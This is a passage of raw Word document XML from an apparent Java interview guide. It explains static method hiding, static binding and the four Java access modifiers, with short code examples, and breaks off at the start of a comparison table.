          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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arent</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26959B1C" w14:textId="77777777" w:rsidR="00DC5BEB" w:rsidRPr="00CE4B95"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arent</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> c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hild</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="546C5757" w14:textId="77777777" w:rsidR="00DC5BEB" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B5F7A19" w14:textId="77777777" w:rsidR="00DC5BEB" w:rsidRPr="00CE4B95"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alling using Parent reference</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78DBF495" w14:textId="77777777" w:rsidR="00DC5BEB" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        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ispl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s: Static method in Parent class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294300BA" w14:textId="77777777" w:rsidR="00DC5BEB" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        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ispl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s: Static method in Parent class (not the Child class)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7F9825" w14:textId="77777777" w:rsidR="00DC5BEB" w:rsidRPr="00CE4B95"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036FDDD" w14:textId="1F6D4A5E" w:rsidR="00DC5BEB" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2950E1BA" w14:textId="77777777" w:rsidR="00366529" w:rsidRPr="00CE4B95" w:rsidRDefault="00366529" w:rsidP="0036652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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF06BFF" w14:textId="77777777" w:rsidR="00366529" w:rsidRPr="00CE4B95" w:rsidRDefault="00366529">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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display() is called using the reference Parent p = new Parent();, the method from the Parent class is called.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="086BDDCC" w14:textId="77777777" w:rsidR="00366529" w:rsidRPr="00CE4B95" w:rsidRDefault="00366529">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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display() is called using the reference Parent c = new Child();, the method from the Parent class is still called, even though the actual object is of type Child. This is because static methods are resolved based on the reference type, not the actual object type.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D288B84" w14:textId="77777777" w:rsidR="00366529" w:rsidRPr="00CE4B95" w:rsidRDefault="00366529" w:rsidP="0036652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077D0778" w14:textId="77777777" w:rsidR="00366529" w:rsidRPr="00CE4B95" w:rsidRDefault="00366529">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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overriding</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Static methods cannot be overridden in the way instance methods can. They can be hidden by defining a static method with the same signature in the subclass.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D09CEA1" w14:textId="3024A248" w:rsidR="00366529" w:rsidRPr="00CE4B95" w:rsidRDefault="00366529">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="331"/>
        </w:numPr>
        <w:jc w:val="both"/>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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Static binding</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The method call is resolved at compile-time, which is why the reference type determines which method gets called, not the actual object type.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0CC443" w14:textId="26C4507A" w:rsidR="001B056A" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="001B056A">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B696E96">
          <v:rect id="_x0000_i1163" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C2913CE" w14:textId="0901C590" w:rsidR="00BE2BC1" w:rsidRPr="00CE4B95" w:rsidRDefault="005121AE">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="39" w:name="_Toc196307519"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain access modifiers in java</w:t>
      </w:r>
      <w:r w:rsidR="00BE2BC1" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="39"/>
    </w:p>
    <w:p w14:paraId="0639AB27" w14:textId="48CC245F" w:rsidR="005C6D56" w:rsidRPr="00CE4B95" w:rsidRDefault="005C6D56" w:rsidP="00783F5D">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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>access modifiers</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are keywords used to specify the visibility or accessibility of classes, methods, constructors, and variables. They determine the scope of access to these members from other classes. There are four types of access modifiers in Java:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D67A565" w14:textId="77777777" w:rsidR="005C6D56" w:rsidRPr="00CE4B95" w:rsidRDefault="005C6D56" w:rsidP="005C6D5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Public (public)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4116AB" w14:textId="77777777" w:rsidR="005C6D56" w:rsidRPr="00CE4B95" w:rsidRDefault="005C6D56">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33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isibility</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The public modifier makes the class, method, constructor, or variable accessible from any other class, regardless of whether it is in the same package or a different package.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="280F6514" w14:textId="77777777" w:rsidR="005C6D56" w:rsidRPr="00CE4B95" w:rsidRDefault="005C6D56">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It provides the least restrictive level of access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A58AA0" w14:textId="77777777" w:rsidR="005C6D56" w:rsidRPr="00CE4B95" w:rsidRDefault="005C6D56" w:rsidP="005C6D5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03CE0C93" w14:textId="77777777"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331387"/>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2C50520" w14:textId="77777777"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3313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x</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B624610" w14:textId="77777777"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331387"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74269872" w14:textId="77777777"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3313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yMetho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7B335F1" w14:textId="77777777"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3313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ublic Method"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01292104" w14:textId="77777777"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3313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E9E9981" w14:textId="108ECB40"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331387"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D4E049" w14:textId="2C13847A" w:rsidR="005C6D56" w:rsidRPr="00CE4B95" w:rsidRDefault="005C6D56" w:rsidP="005C6D56">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41AD1DB2" w14:textId="77777777" w:rsidR="005C6D56" w:rsidRPr="00CE4B95" w:rsidRDefault="005C6D56">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Here, the class MyClass, the variable x, and the method myMethod can be accessed from anywhere.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="295912F4" w14:textId="77777777" w:rsidR="005C6D56" w:rsidRPr="00CE4B95" w:rsidRDefault="005C6D56" w:rsidP="005C6D5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Private (private)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5938D396" w14:textId="77777777" w:rsidR="005C6D56" w:rsidRPr="00CE4B95" w:rsidRDefault="005C6D56">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33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isibility</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The private modifier restricts access to the class, method, constructor, or variable only within the class it is declared. It is the most restrictive access modifier.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7419FD20" w14:textId="77777777" w:rsidR="005C6D56" w:rsidRPr="00CE4B95" w:rsidRDefault="005C6D56">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This is used to hide data from other classes and restrict direct access to it, typically for variables and methods that should not be accessed outside the class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2410BA73" w14:textId="77777777" w:rsidR="005C6D56" w:rsidRPr="00CE4B95" w:rsidRDefault="005C6D56" w:rsidP="005C6D5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02DDB295" w14:textId="77777777"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0471017"/>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E18B222" w14:textId="77777777"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04710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x</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64767813" w14:textId="77777777"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0471017"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE96AD0" w14:textId="77777777"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04710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yMetho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8B37558" w14:textId="77777777"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04710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rivate Method"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A98B43" w14:textId="77777777"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04710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684D7BF" w14:textId="41DD8B75"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0471017"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>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15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C55E47" w14:textId="77777777" w:rsidR="005C6D56" w:rsidRPr="00CE4B95" w:rsidRDefault="005C6D56">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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 x and myMethod can only be accessed from within the MyClass class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EBE96BF" w14:textId="77777777" w:rsidR="005C6D56" w:rsidRPr="00CE4B95" w:rsidRDefault="005C6D56" w:rsidP="005C6D5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Protected (protected)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A9E5C5" w14:textId="77777777" w:rsidR="005C6D56" w:rsidRPr="00CE4B95" w:rsidRDefault="005C6D56">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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isibility</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The protected modifier allows access to the member from:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E07BE0" w14:textId="77777777" w:rsidR="005C6D56" w:rsidRPr="00CE4B95" w:rsidRDefault="005C6D56">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3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ame class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EFD1AE4" w14:textId="77777777" w:rsidR="005C6D56" w:rsidRPr="00CE4B95" w:rsidRDefault="005C6D56">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3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ny subclass (even if it is in a different package).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFD607C" w14:textId="77777777" w:rsidR="005C6D56" w:rsidRPr="00CE4B95" w:rsidRDefault="005C6D56">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3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ther classes in the same package.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096B7614" w14:textId="77777777" w:rsidR="005C6D56" w:rsidRPr="00CE4B95" w:rsidRDefault="005C6D56">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It is typically used when you want to allow subclass access while keeping it hidden from other classes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A9D88A5" w14:textId="77777777" w:rsidR="005C6D56" w:rsidRPr="00CE4B95" w:rsidRDefault="005C6D56" w:rsidP="005C6D5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49370F88" w14:textId="77777777"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058801"/>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05BA3E7" w14:textId="77777777"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0588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otecte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x</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36ABCA68" w14:textId="77777777"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058801"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7780CA6D" w14:textId="77777777"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0588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otecte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yMetho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2E29EDA" w14:textId="77777777"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0588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rotected Method"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF4D05C" w14:textId="77777777"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0588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0727B03" w14:textId="55883DF1"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058801"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>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15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="218841B4" w14:textId="77777777" w:rsidR="005C6D56" w:rsidRPr="00CE4B95" w:rsidRDefault="005C6D56">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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 x and myMethod can be accessed from within the same package or from subclasses (even if they are in different packages).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="034D51E3" w14:textId="77777777" w:rsidR="005C6D56" w:rsidRPr="00CE4B95" w:rsidRDefault="005C6D56" w:rsidP="005C6D5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Default (Package-Private)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="484B2D7B" w14:textId="77777777" w:rsidR="005C6D56" w:rsidRPr="00CE4B95" w:rsidRDefault="005C6D56">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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isibility</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: When no access modifier is specified, it is considered the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>default access level</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. This means the member is accessible only within the same package and not from classes outside the package.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071CB47C" w14:textId="77777777" w:rsidR="005C6D56" w:rsidRPr="00CE4B95" w:rsidRDefault="005C6D56">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It is used when you want to restrict access to members within the same package, but do not want to explicitly define the access level.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7344B9A2" w14:textId="77777777" w:rsidR="005C6D56" w:rsidRPr="00CE4B95" w:rsidRDefault="005C6D56" w:rsidP="005C6D5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59458448" w14:textId="77777777"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59689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AF0AD20" w14:textId="77777777"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5968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Default access modifier</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2E7ED6" w14:textId="77777777"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596896"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C4CC42" w14:textId="77777777"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5968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yMetho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0DCC4C2" w14:textId="77777777"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5968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Default Method"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60753CF0" w14:textId="77777777"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5968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92A9B93" w14:textId="69139663" w:rsidR="00112EBF" w:rsidRPr="00CE4B95"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596896"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>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15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39FE4094" w14:textId="77777777" w:rsidR="005C6D56" w:rsidRPr="00CE4B95" w:rsidRDefault="005C6D56">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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 x and myMethod can only be accessed by classes in the same package.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0037DE" w14:textId="77777777" w:rsidR="005C6D56" w:rsidRPr="00CE4B95" w:rsidRDefault="005C6D56" w:rsidP="005C6D5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75"/>
        <w:gridCol w:w="934"/>
        <w:gridCol w:w="1214"/>
        <w:gridCol w:w="1936"/>
        <w:gridCol w:w="2194"/>
        <w:gridCol w:w="2551"/>
      </w:tblGrid>
      <w:tr w:rsidR="005C6D56" w:rsidRPr="00CE4B95" w14:paraId="2FB30845" w14:textId="77777777" w:rsidTr="005C6D56">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
